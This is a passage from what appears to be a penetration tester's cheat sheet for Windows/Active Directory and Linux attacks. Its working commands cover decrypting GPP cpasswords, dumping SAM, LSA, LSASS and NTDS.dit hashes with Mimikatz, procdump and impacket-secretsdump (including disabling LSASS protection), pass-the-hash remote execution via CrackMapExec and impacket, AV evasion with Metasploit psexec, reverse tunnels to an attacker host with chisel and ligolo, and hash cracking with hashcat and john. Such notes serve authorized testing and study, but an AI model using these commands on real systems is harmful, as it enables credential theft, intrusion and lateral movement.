12. C:\Windows\SYSVOL\Preferences\Groups\Groups.xml on domain controller
13. copy cpassword from cpassword annotation
14. gpp-decrypt [cpassword]
Impacket
impacket-Get-GPPPassword [domain]/[user]:[password]@[DC]
β -xmlfile [Groups.xml file] local β parse local xml file
Pivoting
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
Dumping Hashes
Linux
β cat /etc/passwd β users
β cat /etc/shadow β password hashes
β unshadow /etc/passwd /etc/shadow > hashes.txt β combine for hash cracking
Windows
https://www.thehacker.recipes/ad/movement/credentials/dumping
Hashes are stored in three places:
β SAM β local user accounts
β LSA β domain user accounts
β NTDS.dit β everyone on domain (DC only)
Locally
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Task Manager β Right click lsass.exe β Create dump file
procdump -accepteula -ma lsass.exe lsass.dmp
Control Panel β User Accounts β Credential Manager
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
Mimikatz
β token::elevate
β privilege::debug
β lsadump::sam /patch β SAM hashes
β lsadump::lsa /patch OR lsadump::lsa /inject β LSA hashes
β sekurlsa::msv β hashes in LSASS memory
β sekurlsa::logonpasswords β hashes for users logged in since last reboot
β if this returns an error:
!+
!processprotect /process:lsass.exe /remove
try again
β sekurlsa::credman β hashes in Windows Credential Manager
β lsadump::dcsync /domain:[domain] /all /csv β NTDS.dit
β equivalent of -just-dc in impacket-secretsdump
Impacket
β impacket-secretsdump [domain]/[user]:[password]@[host]
OR
β impacket-secretsdump [domain]/[user]@[host] -hashes [hash]
Flags:
β -just-dc β only NTDS.dit data (NTLM hashes and Kerberos keys)
β -just-dc-ntlm β only NTDS.dit data (NTLM hashes only)
β -sam [SAM file] -system [SYSTEM file] -security [SECURITY file] local β dump directly from SAM
β -ntds [NTDS file] -system [SYSTEM file] -security [SECURITY file] local β dump directly from NTDS
β -no-pass β donβt prompt for password (used with -k)
β -k [ccache file] β use kerberos ticket
CrackMapExec
crackmapexec smb [host] -u [username] -p [password] [--sam/--lsa/--ntds]
Pass-the-Hash (PTH)
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
Note: Hash is in the form [LM hash]:[NT hash] unless otherwise stated. LM hash can also be either empty or 32 zeros in most cases.
Mimikatz
β token::revert
β sekurlsa::pth /user:[user] /domain:[domain] /ntlm:[NT hash] /run:"[command]"
CrackMapExec
β crackmapexec [protocol] [host] -d [domain] -u [user] -H [NT hash] -x [command]
β Can use --local-auth instead of -d
β -t [threads]
β --verbose
crackmapexec [protocol] -h for more info
Protocols:
β FTP
β RDP
β MSSQL
β SMB
β LDAP
β SSH
β WinRM
Impacket
Note: If you have a Kerberos ticket, you can omit -hashes and use -k -no-pass instead. See Request New Initial TGT or Request Delegated TGT above.
β Be sure to modify relevant sections of /etc/krb5.conf: domain_realm and realms
impacket-smbclient [domain]/[user]:[password]@[host]
impacket-smbexec [domain]/[user]:[password]@[host]
impacket-psexec [domain]/[user]:[password]@[host]
impacket-atexec [domain]/[user]:[password]@[host]
impacket-wmiexec [domain]/[user]:[password]@[host]
impacket-dcomexec [domain]/[user]:[password]@[host]
impacket-mssqlclient [domain]/[user]:[password]@[host]
impacket-GetADUsers
impacket-getArch
impacket-lookupsid
impacket-machine_role
impacket-netview
impacket-rdp_check
impacket-mqtt_check
impacket-mimikatz
impacket-reg
impacket-services
impacket-rpcdump
impacket-samrdump
impacket-addcomputer
Metasploit Modules
β exploit/windows/smb/psexec
β βUse custom templates or MOF upload method to circumvent AV detectionβ
β auxiliary/admin/smb/psexec_command
β exploit/windows/local/current_user_psexec
Port Redirection/Tunnelling
SSH
A device has access to a port I want.
ssh [device Iβm connecting to that has what I want β user@ip] -p [port to ssh to that device on β 22] -L [what port of mine I want it on]:[what I want β ip:port]
I have access to a port a device wants.
ssh [device Iβm connecting to that wants what I have β user@ip] -p [port to ssh to that device on β 22] -R [what port of theirs they want it on]:[what they want β ip:port]
ProxyChains
SSH
From target (SSH server on attacker): ssh -fN -R [port] root@[attacker]
From attacker (SSH server on target): ssh -fN -D [port] [user]@[target]
Chisel
On attacker: chisel server -p 8000 --socks5 --reverse
On target: chisel client [attacker]:8000 R:socks
edit /etc/proxychains.conf
...
socks5 [host] 1080
proxychains [command to execute on target]
Ligolo-ng
Prep (on attacker):
ip tuntap add user [user] mode tun ligolo
ip link set ligolo up
ip route add [network] dev ligolo
On attacker (proxy): ligolo -selfcert -laddr 0.0.0.0:8000
On target (agent): ligolo -connect [attacker]:8000 -ignore-cert
session
start
listener_add --addr 0.0.0.0:[target port] --to 127.0.0.1:[kali port] --tcp
Hash Cracking
Wordlist Generation
Crunch
crunch [minimum num characters] [maximum num characters] [characters] -t [pattern] -b [max filesize] -o [filename] -p (no repeating characters) or -p [word1] [word2]... (mix words no repeat)
β pattern:
β @ β lowercase letters
β , β uppercase letters
β % β numbers
β ^ β special characters
crunch [minimum num characters] [maximum num characters] -f /usr/share/crunch/charset.lst [charset] -t [pattern] -b [max filesize] -o [filename]
β search charsets using cat /usr/share/crunch/charset.lst
man crunch for more info
β example: crunch 6 6 0123456789ABCDEF -o crunch1.txt
Cewl
cewl [base URL] -m [min word length] -d [crawl depth] -w [output file] --with-numbers
Identification
hash-identifier
HashCat
hashcat -m [type] [hashes] [wordlist]
hashcat -m [type] -a 3 [hashes] [mask (optional)]
β ?l β lowercase letters
β ?u β uppercase letters
β ?d β digits
β ?s β special characters
β ?a β all of the above
β ?b β yucky bytes (null, etc.)
Windows NTLM: -m 1000
Rules
https://hashcat.net/wiki/doku.php?id=rule_based_attack
/usr/share/hashcat/rules
hashcat -r [file].rule --stdout [wordlist]
hashcat -r [file].rule β¦
John
unshadow /etc/passwd /etc/shadow > [hashlist]
john [hashes] --format=[type] --wordlist=[wordlist]
rm /etc/john/john.pot
Rules
/etc/john/john.conf has all rules
β add section with [List.Rules:rulename] followed by hashcat style rules
john --rules=[rulename]